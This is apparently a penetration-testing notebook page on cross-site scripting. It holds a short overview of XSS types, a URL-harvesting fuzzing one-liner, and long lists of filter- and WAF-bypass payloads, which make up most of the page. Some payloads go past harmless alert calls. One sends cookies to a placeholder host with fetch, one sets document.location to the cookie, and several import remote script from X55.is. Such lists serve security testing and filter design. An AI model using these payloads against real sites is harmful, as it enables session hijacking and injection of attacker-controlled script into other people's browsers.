# XSS

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

{% embed url="<https://xmind.ai/share/CTAMcPfH>" %}

## Types of attack

* &#x20;Cookie Stealing&#x20;
* &#x20;Keylogging&#x20;
* &#x20;Webcam snapshot
* &#x20;Phishing
* &#x20;Port Scanning
* &#x20;Other browser based exploits - There are millions of possibilities with XSS.

## Types of XSS

| Type                             | Description                                                                                                                                                                                                                                  |
| -------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `Stored (Persistent) XSS`        | The most critical type of XSS, which occurs when user input is stored on the back-end database and then displayed upon retrieval (e.g., posts or comments)                                                                                   |
| `Reflected (Non-Persistent) XSS` | Occurs when user input is displayed on the page after being processed by the backend server, but without being stored (e.g., search result or error message)                                                                                 |
| `DOM-based XSS`                  | Another Non-Persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client-side, without reaching the back-end server (e.g., through client-side HTTP parameters or anchor tags) |

## Cheatsheet

{% embed url="<https://portswigger.net/web-security/cross-site-scripting/cheat-sheet>" %}

Extension to incorporate XSS Cheatsheet in Burp

{% embed url="<https://github.com/PortSwigger/xss-cheatsheet>" %}

{% embed url="<https://portswigger.net/bappstore/eb75d39684b845adb457bcb050d1aa1d>" %}

## One Liner

```
waybackurls test.com | tee test.com-urls.txt | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><svg/onload=confirm(1)>' | tee combinedfuzz.json && cat combinedfuzz.json | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<svg/onload=confirm(1)>" && echo -e "$host \e[31m Vulnerable\n" || echo -e "$host \e[32m Not Vulnerable\n";done 
```

{% embed url="<https://github.com/xnl-h4ck3r/urless>" %}

{% embed url="<https://github.com/xnl-h4ck3r/knoxnl>" %}

```
$ waymore -i urls | tee urls-his
$ cat urls-his | gf xss | urless|anew xss
$ knoxnl -i xss -X BOTH 
```

## Fuzzing

{% content-ref url="fuzzing" %}
[fuzzing](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/fuzzing)
{% endcontent-ref %}

{% embed url="<https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt>" %}

### Bypass weak validations

{% embed url="<https://github.com/0xacb/recollapse>" %}

```
echo "<svg/onload=alert(1)>" | recollapse | ffuf -w - -u "https://example.com/?param=FUZZ" -mc 200,403,500
```

## Reflected Parameters

{% embed url="<https://github.com/Emoe/kxss>" %}

{% embed url="<https://github.com/rootDR/ex-param>" %}

{% embed url="<https://github.com/rix4uni/Gxss>" %}

Chrome extension

{% embed url="<https://github.com/ch1y0w0/ParamScan>" %}

## WAF Bypass - Payload Generator

{% embed url="<https://xssnow.in/xss-payload-generator.html>" %}

{% embed url="<https://brutelogic.net/login?redirect_to=/bypaxss/>" %}

```
0123456789012345678901234567890123456789012345678901"><A Href=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FurYlC6SDN10YuQmKTVbN%2Fimage.png?alt=media&#x26;token=314dabf2-b1f4-4923-b2a9-a0ee73a46d10" alt=""><figcaption></figcaption></figure>

#### JS-DOMestify

JS-DOMestify is a simple tool that helps convert any JS code to browser-runnable code with only ASCII characters and minimal, non-intrusive symbols.

{% embed url="<https://nowasky.github.io/JS-DOMestify/>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FqXCNzps9YBNFuVtqRdKR%2Fimage.png?alt=media&#x26;token=b02ab701-b69a-4541-bb99-9223ce99aab5" alt=""><figcaption></figcaption></figure>

## Basic Payloads

```
'"--><svg/onload=top[30]()>${{4*9}}<script>+alert?.``</script>
```

WAF Bypass

```
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)">
<img/src/onerror="document['default'+'View'][`\u0061lert`](3)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:http://X55.is/.source))}//\76-->
```

Base 64 encoded:

```
# http://login.target.com/return_url=sbsbHsjdbdsbsb=
# Payload: "><img src=x onerror=prompt(1337)>

Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KDEzMzcpPg==
```

[Cuneiform](#xss-cuneiform-alphabet-based)-alphabet based

```
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
```

Polyglot payload - All in one

```
1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; >
```

```
1'"<S><Img Src=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
```

```
1'"<S><Input Value=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; PlaceHolder=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
```

```
'"*/onmouseover=(print)?.()><sVg/oNload='1>(_=prompt,_`{{7*7}}`)'></sTyle/</scRIpt/</textArea/</noScript/</tiTle/-->＜h1/<h1><image/onerror='alert`1`%27'src>xhzeem%22%3E%3CSvg/\u0022\u003e\u003csVg/\x22\x3e\x3csVg/&quot;&gt;&lt;svG/onload=alert`2`//
```

Source: <https://brutelogic.com.br/blog/bypassing-whitelists-with-xss-payloads-in-attributes/>

```
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\http://X55.is/.source))}//\76-->
```

Source: <https://x.com/KN0X55/status/1889708590744703269>&#x20;

Grep - Match 1337: <https://portswigger.net/burp/documentation/desktop/tools/intruder/uses/fuzzing>

{% hint style="success" %}

1. *Try to start the payloads with a single quote `'` or a double quote `"`.*&#x20;
2. *Also try with, `>`, `'>` and `">`*
3. *Check the source code to close the appropriate tag if necessary*
   {% endhint %}

{% hint style="success" %}
*Try with confirm() instead of alert()*
{% endhint %}

{% embed url="<https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt>" %}

```javascript
 JavaScript​://%250Aalert?.(1337)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/<​/Style/<​/Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus​= /*${/*/;{/**/(alert)(1337)}//><Base/Href=//hello\76-->
</Scri%7Kt><Scri%7Kt>%7Krompt%6K1337%6K</Scri%7Kt>
"%26%2339>alert(1337)>%26%2339<Svg>
<script>alert(1337);</script>
<sc<script>ript>alert(1337);</script>
<sCriPt>alert(1337);</sCriPt>
<button onmouseover="alert(1337);">xss</button>
<button onclick="alert(1337);">xss</button>
<img src="/static/level3/cloud3.jpg" onclick="alert(1337)">
<img src="x" onerror="alert(1337)">
<img src="x" onerror="alert(1337);"
<img src="#" onerror="&#97;&#108;&#101;&#114;&#116;(1337)">
<img src="#" onerror="al&#x65;rt(1337)">
<img src="#" onerror="eval('alert(1337)')">
<img src onerror %09=top['ale'%2b'rt'](1337)>
<script alert (1337)</script>
<script&#9>alert(1337)</script>
<script&#10>alert (1337)</script>
<script&#13>alert (1)</script>
<%00script>alert(1337)</script>
<script>al%00ert(1)</script>
<input type="text" name ="input" value="1337">
<input type="text" name ="input" value ="><script>alert (1337)</script>
<randomtag type="text" name ="input" value ="><script>alert(1337)</script>
<input/type="text" name="input" value="><script>alert(1337)</script>
<input&#9type="text " name ="input" value =">< alert(1337)</script>
<input&#10type="text" name ="input" value =">< alert(1337)</script>
<input&#13type="text" name ="input" value =">< alert(1337)</script>
<input/'type="text" name ="input" value =">< alert(1337)</script>
<iNpUt type="text" name ="input" value =">< alert(1337)</script>
<%00input type="text" name="input" value="><script>alert(1337)</script>
<inp%00ut type="text" name ="input" value =">< alert(1337)</script>
<input t%00ype="text" name="input" value="><script>alert(1337)</script>
<input type="text" name ="input" value ="><script>a%00lert(1337)</script>
<input onsubmit alert(1337)>
<img onerror=&#34alert(1337)&#34src=x>
<img onerror=&#39alert(1337)&#39src=x>
<img onerror=`alert(1337)` src=x>
<img onerror=&#96alert(1337)&#96src=x>
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1337)>
<<script>alert(1337)//<</script>
«input onsubmit=alert(1337)»
&#174input onsubmit=alert(1337)&#175
<script>eval('a\u006cert(1337)')</script>
<script>eval('al' + 'ert(1337)')</script>
<iframe src="javascript:alert(`1337`)">
testfmy90"onfocus%3d"alert(1337)"autofocus%3d"ed3vz
<script>alert(1337)</script>
<Script>alert(1337)</Script>
<sCript>alert(1337)</sCript>
<script>alert(1337);</script>
<script>alert("1337");</script>
<script>alert(1337)</script>
<script>window.pageType = 'test'-alert(1337)-'';</script>
</script><script>alert(1337)</script>
\&#34;+confirm(1337)+&#34; 
//%01javascript:alert(1337)
%09Jav%09ascript:alert(1337)
/%09/javascript:alert(1337)
/%09/javascript:alert(1337);
//%0Aalert(1337)
////%0Aalert(1337)
//%0D%0Aalert(1337)
/%5cjavascript:alert(1337)
/%5cjavascript:alert(1337);
//%5cjavascript:alert(1337)
//%5cjavascript:alert(1337);
";alert(1337);//
";alert(1337);//bash
java%0d%0ascript%0d%0a:alert(1337)
javascript://%0aalert(1337)
javascript://%00alert(1337)
javascript://%0aalert(1337)
javascript://%0Aalert(1337)
javascript://%250A1?alert(1337):0
javascript://%250Aalert(1337)
javascript://%250Aalert(1337)//?1
javascript:alert(1337)
//javascript:alert(1337)
//javascript:alert(1337);
/javascript:alert(1337)
/javascript:alert(1337);
<>javascript:alert(1337);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1337\)
javascript:alert(1337)
javascript:alert(1337);
javascript:alert(1337)%0d%0a
javascript:confirm(1337)
javascript:prompt(1337)
javascript:void(0);alert(1337)
/x:1/:///%01javascript:alert(1337)/
1')"<S --><A HRef AutoFocus OnFocus=(confirm)(1337)//
JavaScript://%250Dtop.confirm?.(1337)//
1'-top['con\146irm'](1337)-'
/confirm?.(1337)//\
test"/><output name="result" onclick="alert(1337)">chux</output>
<!--%26gt;<TextArea><!--><Script>/*/</TextArea>/*/alert(1337)</Script>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(1337)%3C/scRipt%3E
test"<s><a href=//%26lt;svg/o%26%2378;load=alert(1337)%26gt;>
%22%20onmouseover=alert(1337)%20x=%22
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<Svg OnLoad=location=textContent>JavaS<a>cript:al<a>ert(<a>1337)//
<Svg OnLoad=location=`Java${/S/.source}cript:alert${"\50"}1337)`>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
1'//"</Script><Img/Src%0AOnError=alert(1337)//
jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert(1337)%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert(1337)//%3E%5Cx3e
<script\x20type="text/javascript">javascript:alert(1337);</script>
<script\x3Etype="text/javascript">javascript:alert(1337);</script>
<script\x0Dtype="text/javascript">javascript:alert(1337);</script>
<script\x09type="text/javascript">javascript:alert(1337);</script>
<script\x0Ctype="text/javascript">javascript:alert(1337);</script>
<script\x2Ftype="text/javascript">javascript:alert(1337);</script>
<script\x0Atype="text/javascript">javascript:alert(1337);</script>
'`"><\x3Cscript>javascript:alert(1337)</script>        
'`"><\x00script>javascript:alert(1337)</script>
<img src=1 href=1 onerror="javascript:alert(1337)"></img>
<audio src=1 href=1 onerror="javascript:alert(1337)"></audio>
<video src=1 href=1 onerror="javascript:alert(1337)"></video>
<body src=1 href=1 onerror="javascript:alert(1337)"></body>
<image src=1 href=1 onerror="javascript:alert(1337)"></image>
<object src=1 href=1 onerror="javascript:alert(1337)"></object>
<script src=1 href=1 onerror="javascript:alert(1337)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1337)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1337)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1337)"></iframe onLoad>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a(1337)%20x>
<audio controls onwaiting=alert(1337)><source src=x type=x></audio>
'<00 foo="<a%20href="javascript:alert(1337)">XSS-CLick</00>--%20/
<K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/;{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>\
<section onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></section>
</<K><Svg Onload=alert(1337)>
</<Kno XSS="><Svg Onload=alert(1337)>
<!<K><Svg Onload=alert(1337)>
<!<Kno XSS="><Svg Onload=alert(1337)>
<a href="javascript:alert(1337)">show</a>
<a href="data:text/html;base64,<alert(1337) encoded>"show</a>
<form action="javascript:alert(1337)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1337)">send</button>
<object data="javascript:alert(1337)">
<object data="data:text/html;base64, <alert(1337) encoded>">
<body onload=alert(1337)>
<input type=image src=x:x onerror=alert(1337)>
<isindex onmouseover="alert(1337)" >
<form oninput=alert(1337)><input></form>
<texarea autofocus onfocus=alert(1337)>
<input oncut=alert(1337)>
<svg onload=alert(1337)>
<keygen autofocus onfocus=alert(1337)">
<video><source onerror="alert(1337)">
<marquee onstart=alert(1337)>
<svg/onload=alert(1337)>
<svg//////onload=alert(1337)>
<svg id=x; onload=alert(1337)>
<svg onload%09=alert(1337)>
<svg %09onload=alert(1337)>
<svg %09onload%20=alert(1337)>
<svg onload%09%20%28%2C%3B=alert(1337)>
<svg onload%0B=alert(1337)>
<svg id='x' onload=alert(1337)>
<script>\u0061lert(1337)</script>
<script>\u0061\u006\u0065\u0072\u0074(1337)</script>
<script>eval("\u0061lert(1337)")</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0033\u0033\u0037\u0029")</script>
<img src=x onerror="\u0061lert(1337)"/>
<img src=x onerror="eval('\141lert(1337)')"/>
<img src=x onerror="eval('\x61lert(1337)')"/>
<img src=x onerror="eval('&#x0061;lert(1337)')"/>
<img src=x onerror="eval('&#97;lert(1337)')"/>
<img src=x onerror="eval('\a\l\ert(1\)')"/>
<img src=x onerror="eval('\a\l\ert(1\3\3\7\)')"/>
<object data="JaVScRiPt:alert(1337)">
<object data="javascript&colon;:alert(1337)">
<object data="javascript&#x003A;alert(1337)">
<object data="javascript&#58;alert(1337)">
<object data="&#x6A;avascript:alert(1337)">
<object data="data:text/html,<script>alert(1337)</script>">
<embed code="DaTa:text/html,<script>alert(1337)</script>">
<embed code="data&colon;text/html,<script>alert(1337)</script>">
<embed code="data&#x003A;text/html,<script>alert(1337)</script>">
<embed code="&#x64;&#x61;ta:text/html,<script>alert(1337)</script>">
<scr<iframe>ipt>alert(1337)</script>
<scr<script>ipt>alert(1337)</script>
<svg/onload=alert(1337)
"><svg/onload=alert(1337)>
";alert(1337);//
<iframe><style id="</iframe><img src=1 onerror=alert(1337)>">
<noframes><style id="</noframes><img src=1 onerror=alert(1337)>">
<noscript><p id="</noscript><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src="1" onerror="alert(1337)">">"&gt;
<svg><style><img src="1" onerror="alert(1337)">
<math><style><img src="1" onerror="alert(1337)">
<math><style></style></math><img src="1" onerror="alert(1337)">
<select><style><input><img src=1 onerror=alert(1337)></select>
<select></select><input><img src="1" onerror="alert(1337)">
<body><title><p id="</title><img src onerror=alert(1337)>"></title>
<body><noscript><p id="</noscript><img src onerror=alert(1337)>">
<maths><style><!--</style><img src onerror=alert(1337)>--></style></maths>
<svg><style>/*<img src onerror=alert(1337)>*/</style></svg>
<math><style>/*<img src onerror=alert(1337)>*/
<noscript><style>/*</noscript><img src onerror=alert(1337)>*/
<math><annotation-xml><style><img src onerror=alert(1337)></style></annotation-xml></math>
<body><textarea><a is="</textarea><img src onerror=alert(1337)>">
<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(1337)>">
<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(1337)>">
<Img Src=OnXSS OnError=alert(1337)> 
confirm?.(1337)
<svg/onload=window[`al`+/e/[`ex`+`ec`]`e`+`rt`](1337)>
<svg/onload=window["al"+"ert"]`1337`>
<svg/onload=document['default'+'View'][`\u0061lert`](1337)>
<svg/onload=parent[/al/.source+/ert/.source](1337)>
<svg/onload=parent[/al/.source.concat(/ert/.source)](1337)>
<svg/onload=(function(x){this[x+`ert`](1337)})`al`>
"&quot;"ontoggle=alert(1337)
"' &quot;'"ontoggle=alert1337
1%27/prompt?.(1337)/%27
*prompt(1337)*
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<img//////src=x oNlY=1 oNerror=alert(1337)//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1337>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1337`//>
%3CSVG/oNlY=1%20ONlOAD=confirm(1337)%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601337\%60&#x27;&gt;
<Img Src=OnXSS OnError={prompt`1337`}>
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
"><div/onclick="(function(){setTimeout(()%20=>%20alert(1337),%200);})();">Click%20me!</div>
<Img Src=OnXSS OnError=confirm(1337)>
"><input%0a%0atype="hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/1337/)%0d%0astyle=content-visibility:auto>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto">
x' oncontentvisibilityautostatechange=alert(1337) style='display:block;content-visibility:auto
<p oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto">
test" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto
test" oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto
<Img/Src/OnError=(alert)(1337)>
1%27;--<img%20src=x%20onerror=javascript:alert(1337)>
"></a></td></tr></table><​script>prompt('1337');<​/script></html>//
1")'--><Svg%0COnLoad=(confirm)(1337)<!--
%3Cimg%20src%3Dx%20onerror%3D%22%5Cu0061lert(1337)%22%3E
<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a><style><! \${ </style> }<foo-b id="><img src onerror='alert(1337)'>">hmm...</foo-b></a></table></li></mi></foo-test></math>
'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1337)>
%27";}</script><script>prompt(document.domain);</script>
<svg xmlns="http://w3.org/2000/svg" onload​="this.setAttribute('onmouseover','confirm(1337)')"></svg>
1'"--><A HRef AutoFocus OnFocus=alert(1337)//
1</Script><Script>1/*'/*\'/**//alert(1337)//
";(a=alert,b=1337,a(b))//
frames['alert'](1337)
1;/*'"><Img/Src/OnError=/**/confirm(1337)//>
<script>throw-0o1337n,x=onerror=alert,1337</script>
onToggLe='let%20x=%60javascri%60%3Blet%20y=%60pt:aler%60%3Blet%20z=%60t(1337)%60%3Blet%20a=x+y+z%3Blocation=a'>
<img/src/onerror="(function(x){this[x+`ert`](1337)})`al`">
<img/src/onerror="window[`al`+/e/[`ex`+`ec`]`e`+`rt`](1337)">
<img/src/onerror="document['default'+'View'][`\u0061lert`](1337)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](1337)">
<Img Src=OnXSS OnError=(alert)(1337)>
<A Href AutoFocus %252F="/"OnFocus=k='t',top['aler'%2Bk](1337)>
%3CSVG/oNlY=1%20ONlOAD=confirm(1337)%3E
throw onerror=eval,x=new Error,x.message='alert\x281337\x29',x
--'<00 foo="<a%20href="javascript:prompt(1337)">XSS-Click</00>--%20//
'<00 foo="<a%20href="javascript:alert(1337)">XSS-CLick</00>--%20/ 
</h1>%3CSVG/oNlY=1%20ONlOAD=confirm(1337)%3E
"><svg><animate onbegin=event/>⁄<set attributeName=onerror/to=alert`1337`
<svg onload="a=domain,b=confirm,c=window,c.onerror=b;throw a">
<svg id=javascript:alert(1337) onload=location=id>
<0 name="<svg/onload=alert(1337)>">
<cool/onpointermove=(confirm)(1337)>MoveMouseHere
Payload;"style="width:100%;height:10000px;background:red" onmouseover="alert(1337)
Payload; </ <a href="><svg/onload=alert(1337)>">
"style="width:100%;height:10000px;background:red" onmouseover="alert(1337)
</ <a href="><svg/onload=alert(1337)>">
<a href="javascript:alert/**/('1337')">click</a>
<script>alert/**/('1337')</script>
<svg><script>ale<!-- -->rt('1337')</script></svg>
<svg><script>ale<//looks like js comment>rt('1337')</script></svg>
<img/src/onerror="alert/* */('1337')">
```

Payload List

```javascript
</Scri%7Kt><Scri%7Kt>%7Krompt%6K1%6K</Scri%7Kt>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--</Title/</Style/</Script/</textArea/</iFrame>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\http://X55.is/.source))}//\76-->
"%26%2339>alert(1)>%26%2339<Svg>
<script>alert('xss');</script>
<sc<script>ript>alert('xss');</script>
<sCriPt>alert('xss');</sCriPt>
<button onmouseover="alert('xss');">xss</button>
<button onclick="alert('xss');">xss</button>
<img src="/static/level3/cloud3.jpg" onclick="alert('xss')">
<img src="x" onerror="alert('xss')">
<img src="x" onerror="alert(document.cookie);"
<iframe src="javascript:alert(`xss`)">
testfmy90"onfocus%3d"alert(1)"autofocus%3d"ed3vz
<script>alert(1)</script>
<Script>alert(1)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(123);</script>
<script>alert("test");</script>
<script>alert(document.cookie)</script>
</script><script>alert(document.cookie)</script>
\&#34;+confirm(1)+&#34; 
//%01javascript:alert(1)
%09Jav%09ascript:alert(1)
%09Jav%09ascript:alert(document.domain)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
//%0Aalert(1)
////%0Aalert(1)
//%0D%0Aalert(1)
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
";alert(0);//
";alert(0);//bash
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
java%0d%0ascript%0d%0a:alert(0)
javascript://%0aalert(document.cookie)
javascript://%00alert(1)
javascript://%0aalert(1)
javascript://%0Aalert(1)
javascript://%250A1?alert(1):0
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250Alert(document.location=document.cookie)
javascript:alert(0)
//javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1)
/javascript:alert(1);
<>javascript:alert(1);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1)
javascript:alert(1);
javascript:alert(1)%0d%0a
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
javascript:void(0);alert(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
javascript://whitelisted.com/?z=%0Aalert(1)
/x:1/:///%01javascript:alert(document.cookie)/
1')"<S --><A HRef AutoFocus OnFocus=(confirm)(1)//
JavaScript://%250Dtop.confirm?.(1)//
1'-top['con\146irm'](1)-'
/confirm?.(1)//\
<img src=x onerror="fetch('[HOST]' + document.cookie)" />
<script>fetch('[host]')</script>
test"/><output name="result" onclick="alert('something')">chux</output>
<!--%26gt;<TextArea><!--><Script>/*/</TextArea>/*/alert(1)</Script>
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E
test"<s><a href=//%26lt;svg/o%26%2378;load=alert(1)%26gt;>
%22%20onmouseover=alert(document.domain)%20x=%22
<<https:http://x55.is/onfocus=1?import(tagName):1 AutoFocus ContentEditable>>
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<Svg OnLoad=location=textContent>JavaS<a>cript:al<a>ert(<a>1)//
<Svg OnLoad=location=`Java${/S/.source}cript:alert${"\50"}1)`>
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
1'//"</Script><Img/Src%0AOnError=alert(1)//
jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e
--'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20//
</h1>%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
